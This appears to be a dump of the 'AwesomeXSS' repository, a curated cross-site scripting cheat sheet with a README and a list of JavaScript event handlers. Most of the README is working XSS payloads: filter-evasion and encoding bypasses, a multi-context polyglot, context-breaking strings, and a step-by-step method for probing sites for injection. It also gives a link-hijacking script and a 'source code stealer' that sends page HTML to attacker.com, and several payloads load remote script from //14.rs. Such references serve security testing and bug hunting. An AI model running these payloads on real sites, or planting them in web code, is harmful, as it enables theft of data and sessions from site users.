├── .gitattributes
├── Database
    ├── polyglot.png
    ├── jackmasa-mind-map.png
    └── event-handlers.md
├── LICENSE
└── README.md


/.gitattributes:
--------------------------------------------------------------------------------
1 | * linguist-language=javascript
2 | 


--------------------------------------------------------------------------------
/Database/polyglot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/s0md3v/AwesomeXSS/HEAD/Database/polyglot.png


--------------------------------------------------------------------------------
/Database/jackmasa-mind-map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/s0md3v/AwesomeXSS/HEAD/Database/jackmasa-mind-map.png


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018 Somdev Sangwan
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Database/event-handlers.md:
--------------------------------------------------------------------------------
  1 | # 105 JavaScript Event Handlers
  2 | 
  3 | This list is taken from [OWASP XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
  4 | 
  5 | <br><b>FSCommand</b> (attacker can use this when executed from within an embedded Flash object)
  6 | <br><b>onAbort</b> (when user aborts the loading of an image)
  7 | <br><b>onActivate</b> (when object is set as the active element)
  8 | <br><b>onAfterPrint</b> (activates after user prints or previews print job)
  9 | <br><b>onAfterUpdate</b> (activates on data object after updating data in the source object)
 10 | <br><b>onBeforeActivate</b> (fires before the object is set as the active element)
 11 | <br><b>onBeforeCopy</b> (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
 12 | <br><b>onBeforeCut</b> (attacker executes the attack string right before a selection is cut)
 13 | <br><b>onBeforeDeactivate</b> (fires right after the activeElement is changed from the current object)
 14 | <br><b>onBeforeEditFocus</b> (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
 15 | <br><b>onBeforePaste</b> (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
 16 | <br><b>onBeforePrint</b> (user would need to be tricked into printing or attacker could use the print</b> or execCommand("Print") function).
 17 | <br><b>onBeforeUnload</b> (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
 18 | <br><b>onBeforeUpdate</b> (activates on data object before updating data in the source object)
 19 | <br><b>onBegin</b> (the onbegin event fires immediately when the element's timeline begins)
 20 | <br><b>onBlur</b> (in the case where another popup is loaded and window looses focus)
 21 | <br><b>onBounce</b> (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
 22 | <br><b>onCellChange</b> (fires when data changes in the data provider)
 23 | <br><b>onChange</b> (select, text, or TEXTAREA field loses focus and its value has been modified)
 24 | <br><b>onClick</b> (someone clicks on a form)
 25 | <br><b>onContextMenu</b> (user would need to right click on attack area)
 26 | <br><b>onControlSelect</b> (fires when the user is about to make a control selection of the object)
 27 | <br><b>onCopy</b> (user needs to copy something or it can be exploited using the execCommand("Copy") command)
 28 | <br><b>onCut</b> (user needs to copy something or it can be exploited using the execCommand("Cut") command)
 29 | <br><b>onDataAvailable</b> (user would need to change data in an element, or attacker could perform the same function)
 30 | <br><b>onDataSetChanged</b> (fires when the data set exposed by a data source object changes)
 31 | <br><b>onDataSetComplete</b> (fires to indicate that all data is available from the data source object)
 32 | <br><b>onDblClick</b> (user double-clicks a form element or a link)
 33 | <br><b>onDeactivate</b> (fires when the activeElement is changed from the current object to another object in the parent document)
 34 | <br><b>onDrag</b> (requires that the user drags an object)
 35 | <br><b>onDragEnd</b> (requires that the user drags an object)
 36 | <br><b>onDragLeave</b> (requires that the user drags an object off a valid location)
 37 | <br><b>onDragEnter</b> (requires that the user drags an object into a valid location)
 38 | <br><b>onDragOver</b> (requires that the user drags an object into a valid location)
 39 | <br><b>onDragDrop</b> (user drops an object (e.g. file) onto the browser window)
 40 | <br><b>onDragStart</b> (occurs when user starts drag operation)
 41 | <br><b>onDrop</b> (user drops an object (e.g. file) onto the browser window)
 42 | <br><b>onEnd</b> (the onEnd event fires when the timeline ends.
 43 | <br><b>onError</b> (loading of a document or image causes an error)
 44 | <br><b>onErrorUpdate</b> (fires on a databound object when an error occurs while updating the associated data in the data source object)
 45 | <br><b>onFilterChange</b> (fires when a visual filter completes state change)
 46 | <br><b>onFinish</b> (attacker can create the exploit when marquee is finished looping)
 47 | <br><b>onFocus</b> (attacker executes the attack string when the window gets focus)
 48 | <br><b>onFocusIn</b> (attacker executes the attack string when window gets focus)
 49 | <br><b>onFocusOut</b> (attacker executes the attack string when window looses focus)
 50 | <br><b>onHashChange</b> (fires when the fragment identifier part of the document's current address changed)
 51 | <br><b>onHelp</b> (attacker executes the attack string when users hits F1 while the window is in focus)
 52 | <br><b>onInput</b> (the text content of an element is changed through the user interface)
 53 | <br><b>onKeyDown</b> (user depresses a key)
 54 | <br><b>onKeyPress</b> (user presses or holds down a key)
 55 | <br><b>onKeyUp</b> (user releases a key)
 56 | <br><b>onLayoutComplete</b> (user would have to print or print preview)
 57 | <br><b>onLoad</b> (attacker executes the attack string after the window loads)
 58 | <br><b>onLoseCapture</b> (can be exploited by the releaseCapture</b> method)
 59 | <br><b>onMediaComplete</b> (When a streaming media file is used, this event could fire before the file starts playing)
 60 | <br><b>onMediaError</b> (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
 61 | <br><b>onMessage</b> (fire when the document received a message)
 62 | <br><b>onMouseDown</b> (the attacker would need to get the user to click on an image)
 63 | <br><b>onMouseEnter</b> (cursor moves over an object or area)
 64 | <br><b>onMouseLeave</b> (the attacker would need to get the user to mouse over an image or table and then off again)
 65 | <br><b>onMouseMove</b> (the attacker would need to get the user to mouse over an image or table)
 66 | <br><b>onMouseOut</b> (the attacker would need to get the user to mouse over an image or table and then off again)
 67 | <br><b>onMouseOver</b> (cursor moves over an object or area)
 68 | <br><b>onMouseUp</b> (the attacker would need to get the user to click on an image)
 69 | <br><b>onMouseWheel</b> (the attacker would need to get the user to use their mouse wheel)
 70 | <br><b>onMove</b> (user or attacker would move the page)
 71 | <br><b>onMoveEnd</b> (user or attacker would move the page)
 72 | <br><b>onMoveStart</b> (user or attacker would move the page)
 73 | <br><b>onOffline</b> (occurs if the browser is working in online mode and it starts to work offline)
 74 | <br><b>onOnline</b> (occurs if the browser is working in offline mode and it starts to work online)
 75 | <br><b>onOutOfSync</b> (interrupt the element's ability to play its media as defined by the timeline)
 76 | <br><b>onPaste</b> (user would need to paste or attacker could use the execCommand("Paste") function)
 77 | <br><b>onPause</b> (the onpause event fires on every element that is active when the timeline pauses, including the body element)
 78 | <br><b>onPopState</b> (fires when user navigated the session history)
 79 | <br><b>onProgress</b> (attacker would use this as a flash movie was loading)
 80 | <br><b>onPropertyChange</b> (user or attacker would need to change an element property)
 81 | <br><b>onReadyStateChange</b> (user or attacker would need to change an element property)
 82 | <br><b>onRedo</b> (user went forward in undo transaction history)
 83 | <br><b>onRepeat</b> (the event fires once for each repetition of the timeline, excluding the first full cycle)
 84 | <br><b>onReset</b> (user or attacker resets a form)
 85 | <br><b>onResize</b> (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
 86 | <br><b>onResizeEnd</b> (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
 87 | <br><b>onResizeStart</b> (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
 88 | <br><b>onResume</b> (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
 89 | <br><b>onReverse</b> (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
 90 | <br><b>onRowsEnter</b> (user or attacker would need to change a row in a data source)
 91 | <br><b>onRowExit</b> (user or attacker would need to change a row in a data source)
 92 | <br><b>onRowDelete</b> (user or attacker would need to delete a row in a data source)
 93 | <br><b>onRowInserted</b> (user or attacker would need to insert a row in a data source)
 94 | <br><b>onScroll</b> (user would need to scroll, or attacker could use the scrollBy</b> function)
 95 | <br><b>onSeek</b> (the onreverse event fires when the timeline is set to play in any direction other than forward)
 96 | <br><b>onSelect</b> (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
 97 | <br><b>onSelectionChange</b> (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
 98 | <br><b>onSelectStart</b> (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
 99 | <br><b>onStart</b> (fires at the beginning of each marquee loop)
100 | <br><b>onStop</b> (user would need to press the stop button or leave the webpage)
101 | <br><b>onStorage</b> (storage area changed)
102 | <br><b>onSyncRestored</b> (user interrupts the element's ability to play its media as defined by the timeline to fire)
103 | <br><b>onSubmit</b> (requires attacker or user submits a form)
104 | <br><b>onTimeError</b> (user or attacker sets a time property, such as dur, to an invalid value)
105 | <br><b>onTrackChange</b> (user or attacker changes track in a playList)
106 | <br><b>onUndo</b> (user went backward in undo transaction history)
107 | <br><b>onUnload</b> (as the user clicks any link or presses the back button or attacker forces a click)
108 | <br><b>onURLFlip</b> (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
109 | <br><b>seekSegmentTime</b> (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
110 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # AwesomeXSS
  2 | This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.
  3 | 
  4 | ### Awesome contents
  5 | - [Challenges](https://github.com/s0md3v/AwesomeXSS#awesome-challenges)
  6 | - [Reads & Presentations](https://github.com/s0md3v/AwesomeXSS#awesome-reads--presentations)
  7 | - [Tools](https://github.com/s0md3v/AwesomeXSS#awesome-tools)
  8 | - [Mind maps](https://github.com/s0md3v/AwesomeXSS#awesome-xss-mind-maps)
  9 | - [DOM XSS](https://github.com/s0md3v/AwesomeXSS#awesome-dom-xss)
 10 | - [Payloads](https://github.com/s0md3v/AwesomeXSS#awesome-payloads)
 11 | - [Polyglots](https://github.com/s0md3v/AwesomeXSS#awesome-polyglots)
 12 | - [Tags and event handlers](https://github.com/s0md3v/AwesomeXSS#awesome-tags--event-handlers)
 13 | - [Context breaking](https://github.com/s0md3v/AwesomeXSS#awesome-context-breaking)
 14 |     - [HTML context](https://github.com/s0md3v/AwesomeXSS#html-context)
 15 |     - [Attribute context](https://github.com/s0md3v/AwesomeXSS#attribute-context)
 16 |     - [JavaScript context](https://github.com/s0md3v/AwesomeXSS#javascript-context)
 17 | - [Confirm Variants](https://github.com/s0md3v/AwesomeXSS#awesome-confirm-variants)
 18 | - [Exploits](https://github.com/s0md3v/AwesomeXSS#awesome-exploits)
 19 | - [Probing](https://github.com/s0md3v/AwesomeXSS#awesome-probing)
 20 | - [Bypassing](https://github.com/s0md3v/AwesomeXSS#awesome-bypassing)
 21 | - [Encoding](https://github.com/s0md3v/AwesomeXSS#awesome-encoding)
 22 | - [Tips & tricks](https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks)
 23 | 
 24 | ### Awesome Challenges
 25 | - [prompt.ml](https://prompt.ml)
 26 | - [alf.nu/alert1](https://alf.nu/alert1)
 27 | - [xss-game.appspot.com](https://xss-game.appspot.com)
 28 | - [polyglot.innerht.ml](https://polyglot.innerht.ml)
 29 | - [sudo.co.il/xss](http://sudo.co.il/xss)
 30 | - [root-me.org](https://www.root-me.org/?page=recherche&lang=en&recherche=xss)
 31 | - [chefsecure.com](https://chefsecure.com/courses/xss/challenges)
 32 | - [wechall.net](https://www.wechall.net/challs/XSS)
 33 | - [codelatte.id/labs/xss](https://codelatte.id/labs/xss)
 34 | 
 35 | ### Awesome Reads & Presentations
 36 | - [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)
 37 | - [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
 38 | - [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
 39 | - [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
 40 | - [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)
 41 | - [Copy Pest](https://www.slideshare.net/x00mario/copypest)
 42 | 
 43 | ### Awesome Tools
 44 | - [XSStrike](https://github.com/UltimateHackers/XSStrike)
 45 | - [BeEF](https://github.com/beefproject/beef)
 46 | - [JShell](https://github.com/UltimateHackers/JShell)
 47 | 
 48 | ### Awesome XSS Mind Maps
 49 | A beautiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)
 50 | 
 51 | ### Awesome DOM XSS
 52 | 
 53 | - Does your input go into a sink? `Vulnerable`
 54 | - It doesn't? `Not vulnerable`
 55 | 
 56 | **Source**: An input that could be controlled by an external (untrusted) source.
 57 | 
 58 | ```
 59 | document.URL
 60 | document.documentURI
 61 | document.URLUnencoded (IE 5.5 or later Only)
 62 | document.baseURI
 63 | location
 64 | location.href
 65 | location.search
 66 | location.hash
 67 | location.pathname
 68 | document.cookie
 69 | document.referrer
 70 | window.name
 71 | history.pushState()
 72 | history.replaceState()
 73 | localStorage
 74 | sessionStorage
 75 | ```
 76 | 
 77 | **Sink**: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.
 78 | 
 79 | ```
 80 | eval
 81 | Function
 82 | setTimeout
 83 | setInterval
 84 | setImmediate
 85 | execScript
 86 | crypto.generateCRMFRequest
 87 | ScriptElement.src
 88 | ScriptElement.text
 89 | ScriptElement.textContent
 90 | ScriptElement.innerText
 91 | anyTag.onEventName
 92 | document.write
 93 | document.writeln
 94 | anyElement.innerHTML
 95 | Range.createContextualFragment
 96 | window.location
 97 | document.location
 98 | ```
 99 | 
100 | This comprehensive list of sinks and source is taken from [domxsswiki](https://github.com/wisec/domxsswiki).
101 | 
102 | ### Awesome Payloads
103 | ```
104 | <A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
105 | <d3"<"/onclick="1>[confirm``]"<">z
106 | <d3/onmouseenter=[2].find(confirm)>z
107 | <details open ontoggle=confirm()>
108 | <script y="><">/*<script* */prompt()</script
109 | <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
110 | <a href="javascript%26colon;alert(1)">click
111 | <a href=javas&#99;ript:alert(1)>click
112 | <script/"<a"/src=data:=".<a,[8].some(confirm)>
113 | <svg/x=">"/onload=confirm()//
114 | <--`<img/src=` onerror=confirm``> --!>
115 | <svg%0Aonload=%09((pro\u006dpt))()//
116 | <sCript x>(((confirm)))``</scRipt x>
117 | <svg </onload ="1> (_=prompt,_(1)) "">
118 | <!--><script src=//14.rs>
119 | <embed src=//14.rs>
120 | <script x=">" src=//15.rs></script>
121 | <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
122 | <iframe/src \/\/onload = prompt(1)
123 | <x oncut=alert()>x
124 | <svg onload=write()>
125 | ```
126 | 
127 | ### Awesome Polyglots
128 | 
129 | Here's an XSS polyglot that I made which can break out of 20+ contexts:
130 | ```
131 | %0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
132 | ```
133 | 
134 | Explanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)
135 | 
136 | ### Awesome Tags & Event Handlers
137 | - [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
138 | - [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)
139 | 
140 | Some less detected event handlers
141 | ```
142 | ontoggle
143 | onauxclick
144 | ondblclick
145 | oncontextmenu
146 | onmouseleave
147 | ontouchcancel
148 | ```
149 | 
150 | Some HTML Tags that you will be using
151 | ```
152 | img
153 | svg
154 | body
155 | html
156 | embed
157 | script
158 | object
159 | details
160 | isindex
161 | iframe
162 | audio
163 | video
164 | ```
165 | 
166 | ### Awesome Context Breaking
167 | 
168 | #### HTML Context
169 | Case: `<tag>You searched for $input. </tag>`
170 | 
171 | ```
172 | <svg onload=alert()>
173 | </tag><svg onload=alert()>
174 | ```
175 | 
176 | #### Attribute Context
177 | 
178 | Case: `<tag attribute="$input">`
179 | 
180 | ```
181 | "><svg onload=alert()>
182 | "><svg onload=alert()><b attr="
183 | " onmouseover=alert() "
184 | "onmouseover=alert()//
185 | "autofocus/onfocus="alert()
186 | ```
187 | #### JavaScript Context
188 | 
189 | Case: `<script> var new something = '$input'; </script>`
190 | 
191 | ```
192 | '-alert()-'
193 | '-alert()//'
194 | '}alert(1);{'
195 | '}%0Aalert(1);%0A{'
196 | </script><svg onload=alert()>
197 | ```
198 | 
199 | ### Awesome Confirm Variants
200 | Yep, confirm because alert is too mainstream.
201 | ```
202 | confirm()
203 | confirm``
204 | (confirm``)
205 | {confirm``}
206 | [confirm``]
207 | (((confirm)))``
208 | co\u006efirm()
209 | new class extends confirm``{}
210 | [8].find(confirm)
211 | [8].map(confirm)
212 | [8].some(confirm)
213 | [8].every(confirm)
214 | [8].filter(confirm)
215 | [8].findIndex(confirm)
216 | ```
217 | 
218 | ### Awesome Exploits
219 | ##### Replace all links
220 | ```javascript
221 | Array.from(document.getElementsByTagName("a")).forEach(function(i) {
222 |   i.href = "https://attacker.com";
223 | });
224 | ```
225 | ##### Source Code Stealer
226 | ```html
227 | <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
228 | ```
229 | 
230 | ### Awesome Probing
231 | If nothing of this works, take a look at **Awesome Bypassing** section
232 | 
233 | First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about number and contexts of reflections.
234 | <br>Now for attribute context, check if double quotes (") are being filtered by entering `x"d3v`. If it gets altered to `x&quot;d3v`, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`, if it gets altered to `x&apos;`, you are doomed. The only thing you can try is encoding.<br>
235 | If the quotes are not being filtered, you can simply try payloads from **Awesome Context Breaking** section.
236 | <br>For javascript context, check which quotes are being used for example if they are doing
237 | ```
238 | variable = 'value' or variable = "value"
239 | ```
240 | Now lets say single quotes (') are in use, in that case enter `x'd3v`. If it gets altered to `x\'d3v`, try escaping the backslash (\) by adding a backslash to your probe i.e. `x\'d3v`. If it works use the following payload:
241 | ```
242 | \'-alert()//
243 | ```
244 | But if it gets altered to `x\\\'d3v`, the only thing you can try is closing the script tag itself by using
245 | ```
246 | </script><svg onload=alert()>
247 | ```
248 | For simple HTML context, the probe is `x<d3v`. If it gets altered to `x&gt;d3v`, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is `x<xxx>`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `<` and `>`. It can simply bypassed using
249 | ```
250 | <svg onload=alert()//
251 | ```
252 | or this (it will not work in all cases)
253 | ```
254 | <svg onload=alert()
255 | ```
256 | If the your dummy tags lands in the source code as it is, go for any of these payloads
257 | ```
258 | <svg onload=alert()>
259 | <embed src=//14.rs>
260 | <details open ontoggle=alert()>
261 | ```
262 | 
263 | ### Awesome Bypassing
264 | 
265 | **Note:** None of these payloads use single (') or double quotes (").
266 | 
267 | - Without event handlers
268 | ```
269 | <object data=javascript:confirm()>
270 | <a href=javascript:confirm()>click here
271 | <script src=//14.rs></script>
272 | <script>confirm()</script>
273 | ```
274 | - Without space
275 | ```
276 | <svg/onload=confirm()>
277 | <iframe/src=javascript:alert(1)>
278 | ```
279 | - Without slash (/)
280 | ```
281 | <svg onload=confirm()>
282 | <img src=x onerror=confirm()>
283 | ```
284 | - Without equal sign (=)
285 | ```
286 | <script>confirm()</script>
287 | ```
288 | - Without closing angular bracket (>)
289 | ```
290 | <svg onload=confirm()//
291 | ```
292 | - Without alert, confirm, prompt
293 | ```
294 | <script src=//14.rs></script>
295 | <svg onload=co\u006efirm()>
296 | <svg onload=z=co\u006efir\u006d,z()>
297 | ```
298 | - Without a Valid HTML tag
299 | ```
300 | <x onclick=confirm()>click here
301 | <x ondrag=aconfirm()>drag it
302 | ```
303 | 
304 | - Bypass tag blacklisting
305 | ```
306 | </ScRipT>
307 | </script
308 | </script/>
309 | </script x>
310 | ```
311 | 
312 | ### Awesome Encoding
313 | 
314 | |HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|
315 | |----|----|-------|-----------|----|--------|----------|---|
316 | |`&quot;`|"|`&#34;`|quotation mark|u+0022|\0022|\42|%22|
317 | |`&num;`|#|`&#35;`|number sign|u+0023|\0023|\43|%23|
318 | |`&dollar;`|$|`&#36;`|dollar sign|u+0024|\0024|\44|%24|
319 | |`&percnt;`|%|`&#37;`|percent sign|u+0025|\0025|\45|%25|
320 | |`&amp;`|&|`&#38;`|ampersand|u+0026|\0026|\46|%26|
321 | |`&apos;`|'|`&#39;`|apostrophe|u+0027|\0027|\47|%27|
322 | |`&lpar;`|(|`&#40;`|left parenthesis|u+0028|\0028|\50|%28|
323 | |`&rpar;`|)|`&#41;`|right parenthesis|u+0029|\0029|\51|%29|
324 | |`&ast;`|*|`&#42;`|asterisk|u+002A|\002a|\52|%2A|
325 | |`&plus;`|+|`&#43;`|plus sign|u+002B|\002b|\53|%2B|
326 | |`&comma;`|,|`&#44;`|comma|u+002C|\002c|\54|%2C|
327 | |`&minus;`|-|`&#45;`|hyphen-minus|u+002D|\002d|\55|%2D|
328 | |`&period;`|.|`&#46;`|full stop; period|u+002E|\002e|\56|%2E|
329 | |`&sol;`|/|`&#47;`|solidus; slash|u+002F|\002f|\57|%2F|
330 | |`&colon;`|:|`&#58;`|colon|u+003A|\003a|\72|%3A|
331 | |`&semi;`|;|`&#59;`|semicolon|u+003B|\003b|\73|%3B|
332 | |`&lt;`|<|`&#60;`|less-than|u+003C|\003c|\74|%3C|
333 | |`&equals;`|=|`&#61;`|equals|u+003D|\003d|\75|%3D|
334 | |`&gt;`|>|`&#62;`|greater-than sign|u+003E|\003e|\76|%3E|
335 | |`&quest;`|?|`&#63;`|question mark|u+003F|\003f|\77|%3F|
336 | |`&commat;`|@|`&#64;`|at sign; commercial at|u+0040|\0040|\100|%40|
337 | |`&lsqb;`|\[|`&#91;`|left square bracket|u+005B|\005b|\133|%5B|
338 | |`&bsol;`|&bsol;|`&#92;`|backslash|u+005C|\005c|\134|%5C|
339 | |`&rsqb;`|]|`&#93;`|right square bracket|u+005D|\005d|\135|%5D|
340 | |`&Hat;`|^|`&#94;`|circumflex accent|u+005E|\005e|\136|%5E|
341 | |`&lowbar;`|_|`&#95;`|low line|u+005F|\005f|\137|%5F|
342 | |`&grave;`|\`|`&#96;`|grave accent|u+0060|\0060|\u0060|%60|
343 | |`&lcub;`|{|`&#123;`|left curly bracket|u+007b|\007b|\173|%7b|
344 | |`&verbar;`|\||`&#124;`|vertical bar|u+007c|\007c|\174|%7c|
345 | |`&rcub;`|}|`&#125;`|right curly bracket|u+007d|\007d|\175|%7d|
346 | 
347 | ### Awesome Tips & Tricks
348 | - `http(s)://` can be shortened to `//` or `/\\` or `\\`.
349 | - `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
350 | - alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`
351 | - You can use `//` to close a tag instead of `>`.
352 | - I have found that `confirm` is the least detected pop-up function so stop using `alert`.
353 | - Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use `<script src=//14.rs>` instead of `<script src="//14.rs">`
354 | - The shortest HTML context XSS payload is `<script src=//14.rs>` (19 chars)
355 | 
356 | ### Awesome Credits
357 | All the payloads are crafted by me unless specified.
358 | 


--------------------------------------------------------------------------------